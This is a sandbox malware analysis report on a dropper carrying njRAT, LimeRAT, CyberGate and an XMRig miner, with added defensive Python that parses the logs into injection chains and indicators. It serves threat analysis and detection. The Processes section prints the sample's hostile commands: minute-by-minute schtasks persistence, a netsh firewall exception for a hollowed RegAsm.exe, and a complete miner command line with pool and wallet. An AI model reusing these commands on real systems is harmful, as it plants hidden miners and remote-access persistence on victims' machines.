Malware Analysis Report

2024-11-16 13:10

Sample ID: 220525-bkbrjahfdr
Target: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
SHA256: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
Tags: cybergate limerat njrat xmrig noip noipchiper evasion miner persistence rat stealer trojan upx
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
Threat Level: Known bad

Malicious Activity Summary

Family detections:
xmrig
njRAT/Bladabindi
CyberGate, Rebhip
LimeRAT
XMRig Miner Payload

Behaviours:
Modifies Windows Firewall
UPX packed file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Adds Run key to start application
Maps connected drives based on registry
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
AutoIT Executable
Enumerates physical storage devices
Program crash
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-05-25 01:11

Signatures

AutoIT Executable (no indicator details recorded)

Analysis: behavioral1

Detonation Overview

Submitted: 2022-05-25 01:11
Reported: 2022-05-25 01:15
Platform: win7-20220414-en
Max time kernel: 151s
Max time network: 155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"

Signatures

Family and packer detections (the sandbox recorded no indicator rows for these):

CyberGate, Rebhip (tags: trojan, stealer, cybergate)
LimeRAT (tags: rat, limerat)
njRAT/Bladabindi (tags: trojan, njrat)
xmrig (tags: miner, xmrig)
XMRig Miner Payload (tag: miner; 3 matches)
Modifies Windows Firewall (tag: evasion; see the netsh command under Processes)
UPX packed file (tag: upx; 3 matches)

Checks BIOS information in registry

Description Indicator Process Count
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\efsui\data.exe 2
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\n.exe 1

SystemBiosVersion, together with the SystemManufacturer and SystemProductName reads listed under "Enumerates system info in registry" below, is where hypervisor vendor strings (VirtualBox, VMware, QEMU, Xen) appear on a virtual machine, so these queries read as a sandbox/VM check rather than hardware inventory.

Loads dropped DLL

Process Events
C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 20
C:\Users\Admin\AppData\Local\Temp\moxia.EXE 2
C:\Users\Admin\AppData\Local\Temp\c.exe 3
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe 1
(No indicator or target column was recorded for these events; counts collapse the identical rows in the source.)

Adds Run key to start application

persistence
Description Indicator Process
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\moxia.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\moxia.EXE
Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

The RunOnce\wextract_cleanup0 value (advpack.dll,DelNodeRunDLL32 on an IXP000.TMP directory) is the standard clean-up hook written by the Windows IExpress/WEXTRACT self-extractor that moxia.EXE is packaged with: it deletes the extraction directory at the next logon and is not itself a persistence mechanism. The persistence in this signature is the HKCU Run value BGPRAZQPUI pointing at SystemProcess.exe, written by the extracted moxiacyb.exe; the same binary is also registered by the LNUEFWGBWWOQ scheduled tasks under Processes.

Legitimate hosting services abused for malware hosting/C2

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

AutoIT Executable (40 matches, no indicator details recorded)

Drops file in System32 directory

Description Indicator Process Count
File opened for modification C:\Windows\SysWOW64\winmgmts:\root\cimv2 C:\Users\Admin\AppData\Roaming\efsui\data.exe 2

Caveat: the "file" here is the WMI moniker winmgmts:\root\cimv2 handed to a file API and resolved against the process's working directory (SysWOW64 for a task-launched 32-bit process), not a genuine write into System32. The same moniker is what trips the "NTFS ADS" signature below for n.exe, because of the colon after winmgmts.

Suspicious use of SetThreadContext

Source PID Source process Target PID Target process
932 C:\Users\Admin\AppData\Local\Temp\c.exe 1632 C:\Users\Admin\AppData\Local\Temp\c.exe
1828 C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1560 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
1692 C:\Users\Admin\AppData\Local\Temp\li4.exe 1340 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
1548 C:\Users\Admin\AppData\Local\Temp\n.exe 932 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
572 C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe 1440 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
892 C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe 700 C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
336 C:\Users\Admin\AppData\Roaming\Spectrum\service.exe 2108 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
880 C:\Users\Admin\AppData\Roaming\efsui\data.exe 2740 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
2996 C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe 3036 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
2956 C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe 3028 C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
2936 C:\Users\Admin\AppData\Roaming\Spectrum\service.exe 2176 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Every target other than the self-injecting c.exe and sessionmsg.exe is RegAsm.exe or RegSvcs.exe, the signed .NET Framework utilities these families hollow out so that the payload runs under a Microsoft image name (and so that the netsh allowedprogram rule under Processes, which whitelists RegAsm.exe, covers the C2 traffic). The last three rows (PIDs 2996, 2956, 2936) are the same three persistence binaries started again by their one-minute scheduled tasks. Note that PID 932 appears here as a RegAsm.exe host after the sandbox reused the PID that c.exe had earlier.
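The SetThreadContext table above and the WriteProcessMemory table further down are easier to read as one graph. The following Python is an added example written for this page, not tooling from the sandbox or from any of the families named in the report: it parses the report's own row format, keys every process on (PID, image) so that the sandbox's reuse of PID 932 does not merge c.exe with the later RegAsm.exe host, labels each edge by the write/context pattern, and expands the root-to-leaf chains. The rows are copied from the two tables (one per distinct source/target pair, without the re-run of the persistence binaries); the hollowing-host list and the kind labels are my own assumptions.

```python
"""Rebuild the injection chains behind the SetThreadContext and
WriteProcessMemory signature rows of this report (added example)."""
import re
from collections import defaultdict

# Rows copied from the report's two injection tables, one per distinct
# source/target pair (the report repeats each WriteProcessMemory pair once
# per call); the re-run of the persistence binaries (PIDs 2996/2956/2936)
# is left out to keep the sample short.
TMP = r"C:\Users\Admin\AppData\Local\Temp"
ROAM = r"C:\Users\Admin\AppData\Roaming"
MAIN = TMP + r"\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
ROWS = [
    f"PID 1828 wrote to memory of 1396 N/A {MAIN} {TMP}\\moxia.EXE",
    f"PID 1828 wrote to memory of 932 N/A {MAIN} {TMP}\\c.exe",
    f"PID 1828 wrote to memory of 1692 N/A {MAIN} {TMP}\\li4.exe",
    f"PID 1396 wrote to memory of 1820 N/A {TMP}\\moxia.EXE {TMP}\\IXP000.TMP\\moxiacyb.exe",
    f"PID 1828 wrote to memory of 1548 N/A {MAIN} {TMP}\\n.exe",
    f"PID 932 wrote to memory of 1632 N/A {TMP}\\c.exe {TMP}\\c.exe",
    f"PID 1828 wrote to memory of 592 N/A {MAIN} {TMP}\\Legion Elite Proxies Grabber v1.exe",
    f"PID 1828 wrote to memory of 1560 N/A {MAIN} {REGASM}",
    f"PID 1632 wrote to memory of 1896 N/A {TMP}\\c.exe {TMP}\\c.exe",
    f"PID 932 set thread context of 1632 N/A {TMP}\\c.exe {TMP}\\c.exe",
    f"PID 1828 set thread context of 1560 N/A {MAIN} {REGASM}",
    f"PID 1692 set thread context of 1340 N/A {TMP}\\li4.exe {REGSVCS}",
    f"PID 1548 set thread context of 932 N/A {TMP}\\n.exe {REGASM}",
    f"PID 572 set thread context of 1440 N/A {ROAM}\\SystemSettingsAdminFlows\\service.exe {REGSVCS}",
    f"PID 892 set thread context of 700 N/A {ROAM}\\smss\\sessionmsg.exe {ROAM}\\smss\\sessionmsg.exe",
    f"PID 336 set thread context of 2108 N/A {ROAM}\\Spectrum\\service.exe {REGASM}",
    f"PID 880 set thread context of 2740 N/A {ROAM}\\efsui\\data.exe {REGASM}",
]

ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<op>set thread context of|wrote to memory of) "
    r"(?P<dst>\d+) N/A (?P<src_img>.+?\.exe) (?P<dst_img>.+?\.exe)$", re.I)
# Signed .NET Framework utilities these families hollow out (assumption: any
# other target image is treated as a plain child or as a copy of the source).
HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_rows(rows):
    """{(src_pid, src_image, dst_pid, dst_image): {"write" | "context"}}.
    Nodes are keyed on (pid, image), not bare pid: the sandbox reused PID
    932 for c.exe and later for a RegAsm.exe host."""
    edges = defaultdict(set)
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        key = (int(m["src"]), m["src_img"], int(m["dst"]), m["dst_img"])
        edges[key].add("context" if m["op"].startswith("set") else "write")
    return dict(edges)


def classify(edges):
    """Label each edge by what the write/context pattern implies."""
    findings = []
    for (src, src_img, dst, dst_img), ops in sorted(edges.items()):
        if basename(dst_img).lower() in HOLLOW_HOSTS:
            kind = "hollowing"       # payload ends up inside a Microsoft-signed image
        elif src_img.lower() == dst_img.lower():
            kind = "self-injection"  # unpacker overwrites a fresh copy of itself
        else:
            kind = "child-write"     # dropper staging a child; no context switch seen
        findings.append({"src": src, "dst": dst, "target": basename(dst_img),
                         "ops": sorted(ops), "kind": kind})
    return findings


def chains(edges):
    """Expand every root-to-leaf path through the injection graph."""
    children, has_parent = defaultdict(list), set()
    for src, src_img, dst, dst_img in edges:
        children[(src, src_img)].append((dst, dst_img))
        has_parent.add((dst, dst_img))
    paths = []

    def walk(node, path):
        path = path + [(node[0], basename(node[1]))]
        if node in children:
            for child in children[node]:
                walk(child, path)
        else:
            paths.append(path)

    for root in sorted(n for n in children if n not in has_parent):
        walk(root, [])
    return paths


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    for f in classify(edges):
        print(f"{f['src']:>5} -> {f['dst']:<5} {f['kind']:<15} {'+'.join(f['ops']):<13} {f['target']}")
    for path in chains(edges):
        print(" -> ".join(f"{pid}:{name}" for pid, name in path))
```

Only two pairs show both a write and a context switch in the rows the report keeps (1828 into RegAsm.exe 1560, and c.exe 932 into its own copy 1632); the other hollowing edges have a SetThreadContext row without a matching WriteProcessMemory row, which is worth remembering when a detection rule requires both calls from the same parent. The longest chain is the unpacker: the dropper writes c.exe, which re-executes itself twice (932 to 1632 to 1896).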

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Count
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\efsui\data.exe 2
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Roaming\efsui\data.exe 2
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\efsui\data.exe 2
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\n.exe 1
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\n.exe 1
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\n.exe 1

NTFS ADS

Description Indicator Process
File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 C:\Users\Admin\AppData\Local\Temp\n.exe

Caveat: this is the WMI moniker winmgmts:\root\cimv2 resolved relative to n.exe's working directory; the colon after winmgmts is what matches the alternate-data-stream heuristic, so the row is not evidence that the sample writes to an ADS.

Suspicious behavior: GetForegroundWindowSpam

Process: C:\Users\Admin\AppData\Local\Temp\c.exe

Suspicious use of AdjustPrivilegeToken

Privilege Process Count
SeDebugPrivilege C:\Users\Admin\AppData\Local\Temp\c.exe 2
SeLockMemoryPrivilege C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe 2
SeDebugPrivilege C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 1
33 (LUID 33 = SeIncreaseWorkingSetPrivilege) C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 7
SeIncBasePriorityPrivilege C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 7
SeDebugPrivilege C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 2

SeLockMemoryPrivilege on EATLFEPWN.exe is what XMRig requests in order to back its scratchpad with large pages; the sandbox logs it as the raw value 33 for the working-set privilege because it has no name mapping for that LUID. The RegAsm.exe and RegSvcs.exe entries belong to the hollowed hosts from the SetThreadContext table, not to the genuine .NET utilities.

Suspicious use of WriteProcessMemory

Source PID Source process Target PID Target process Calls
1828 C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1396 C:\Users\Admin\AppData\Local\Temp\moxia.EXE 7
1828 C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 932 C:\Users\Admin\AppData\Local\Temp\c.exe 4
1828 C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1692 C:\Users\Admin\AppData\Local\Temp\li4.exe 4
1396 C:\Users\Admin\AppData\Local\Temp\moxia.EXE 1820 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe 7
1828 C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1548 C:\Users\Admin\AppData\Local\Temp\n.exe 4
932 C:\Users\Admin\AppData\Local\Temp\c.exe 1632 C:\Users\Admin\AppData\Local\Temp\c.exe 6
1828 C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 592 C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe 4
1828 C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1560 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 9
1632 C:\Users\Admin\AppData\Local\Temp\c.exe 1896 C:\Users\Admin\AppData\Local\Temp\c.exe 19

Each row collapses the identical repeated entries in the source (one per WriteProcessMemory call). The four-call groups are the dropper writing into each freshly created child before it starts; the nine calls into RegAsm.exe 1560 and the six/nineteen calls of c.exe into its own copies are the image replacements that the SetThreadContext rows above complete.

Processes

One line per process, in the order the sandbox recorded them, showing the command line as executed:

"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"
"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"
"C:\Users\Admin\AppData\Local\Temp\c.exe"
"C:\Users\Admin\AppData\Local\Temp\li4.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
"C:\Users\Admin\AppData\Local\Temp\n.exe"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
"C:\Users\Admin\AppData\Local\Temp\c.exe"
"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
"C:\Users\Admin\AppData\Local\Temp\c.exe"
"C:\Users\Admin\AppData\Local\Temp\c.exe"
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
taskeng.exe {734AD315-4209-4015-A1BF-8A6AB4AD31E7} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

The unquoted launches of service.exe, data.exe, sessionmsg.exe and SystemProcess.exe that follow taskeng.exe are the scheduled tasks firing; each task is recreated with /F on every run, which is why the same schtasks commands recur, and the four Roaming\...\*.exe binaries together with SystemProcess.exe are the persistent set. The EATLFEPWN.exe line is a complete XMRig configuration: pool de2.moriaxmr.com:3333, the Monero wallet after -u, pool password cyber, algorithm cryptonight, and a 55% CPU cap chosen to stay inconspicuous.
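The command lines above carry the sample's persistence (schtasks /create every minute, plus the Run key from the "Adds Run key to start application" signature), its firewall change and the whole miner configuration. This added Python is my example for turning those into a flat indicator list; it is not the sandbox's own parser. The command lines and the two registry rows are copied from this report; the tokenizer, the parsing rules, the field names and the stratum+tcp:// pool-URL form are assumptions that cover only the shapes seen here.

```python
"""Extract persistence, firewall and miner indicators from the process
command lines and Run-key rows of this report (added example)."""
import re

# Command lines copied from the Processes list above (repeats dropped) plus
# one plain RegAsm.exe launch that carries no indicator.
CMDLINES = [
    r"schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1",
    r"schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1",
    r"C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55",
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F',
    r'netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F',
    r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"',
]
# The two rows of the "Adds Run key to start application" signature.
REG_ROWS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe N/A',
]

POOL_RE = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?(?P<host>[A-Za-z0-9.-]+):(?P<port>\d{2,5})$")
REG_RE = re.compile(r'^Set value \(str\) (?P<key>\S+) = "(?P<val>(?:[^"\\]|\\.)*)" (?P<proc>.+?\.exe) N/A$', re.I)


def tokens(cmd):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_schtasks(toks):
    low = [t.lower() for t in toks]
    if _base(toks[0]) != "schtasks.exe" or "/create" not in low:
        return None
    opts = {t: toks[i + 1] for i, t in enumerate(low)
            if t.startswith("/") and i + 1 < len(toks) and not low[i + 1].startswith("/")}
    # /sc minute /mo N -> every N minutes; /sc onidle /i N -> after N idle minutes
    interval = opts.get("/mo") or opts.get("/i")
    return {"type": "scheduled_task", "name": opts.get("/tn"), "run": opts.get("/tr"),
            "schedule": (opts.get("/sc", "").lower(), interval), "force": "/f" in low}


def parse_netsh(toks):
    low = [t.lower() for t in toks]
    if _base(low[0]) not in ("netsh", "netsh.exe") or low[1:4] != ["firewall", "add", "allowedprogram"]:
        return None
    return {"type": "firewall_allow", "program": toks[4], "rule_name": toks[5],
            "mode": toks[6].upper() if len(toks) > 6 else None}


def parse_miner(toks):
    """XMRig-style flags: -o pool:port -u wallet [-p pass] [-a algo] [--max-cpu-usage N]."""
    args = {t: toks[i + 1] for i, t in enumerate(toks) if t.startswith("-") and i + 1 < len(toks)}
    pool = POOL_RE.match(args.get("-o", ""))
    if not pool or "-u" not in args:
        return None
    cpu = args.get("--max-cpu-usage")
    return {"type": "miner", "binary": toks[0], "pool_host": pool["host"],
            "pool_port": int(pool["port"]), "wallet": args["-u"], "pool_password": args.get("-p"),
            "algo": args.get("-a") or args.get("--algo"), "max_cpu_usage": int(cpu) if cpu else None}


def parse_reg_row(row):
    m = REG_RE.match(row)
    if not m:
        return None
    value = re.sub(r"\\(.)", r"\1", m["val"])   # undo the report's C-style escaping
    key, name = m["key"].rsplit("\\", 1)
    # IExpress/WEXTRACT writes this RunOnce hook to delete its IXP000.TMP directory.
    cleanup = key.lower().endswith("runonce") and "delnoderundll32" in value.lower()
    return {"type": "run_key", "key": key, "value_name": name, "run": value.strip('"'),
            "written_by": m["proc"],
            "note": "IExpress extraction-directory cleanup, not persistence" if cleanup else "autostart"}


def extract(cmdlines, reg_rows=()):
    iocs = []
    for cmd in cmdlines:
        toks = tokens(cmd)
        for parser in (parse_schtasks, parse_netsh, parse_miner):
            ioc = parser(toks)
            if ioc:
                iocs.append(ioc)
                break
    iocs.extend(i for i in map(parse_reg_row, reg_rows) if i)
    return iocs


def autostart_binaries(iocs):
    """Every distinct path the sample arranged to have re-launched."""
    return sorted({i["run"].lower() for i in iocs
                   if (i["type"] == "scheduled_task" and i["run"])
                   or (i["type"] == "run_key" and i["note"] == "autostart")})


if __name__ == "__main__":
    found = extract(CMDLINES, REG_ROWS)
    for ioc in found:
        print(ioc)
    print(autostart_binaries(found))
```

Keying autostart_binaries on the lower-cased target path is what collapses SystemProcess.exe, which is registered twice by schtasks (minute and onidle triggers) and once through the Run value, into a single entry; the resulting five paths are the ones to sweep for on other hosts, and the five task names are the ones to look for in schtasks /query output.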

Network

Country Destination Domain Proto Count
US 8.8.8.8:53 de2.moriaxmr.com udp 1
US 8.8.8.8:53 red4.hopto.org udp 9
US 8.8.8.8:53 pastebin.com udp 1
US 104.20.68.143:443 pastebin.com tcp 1

Counts collapse the identical rows in the source. Only DNS lookups were recorded for de2.moriaxmr.com (the pool on the XMRig command line; no connection to port 3333 appears in the capture) and for red4.hopto.org (a No-IP dynamic-DNS hostname, which is what the noip tag refers to; the nine lookups in roughly two and a half minutes are a RAT retrying its C2 resolution). The only completed TCP connection is HTTPS to pastebin.com, presumably the "legitimate hosting service" flagged above.
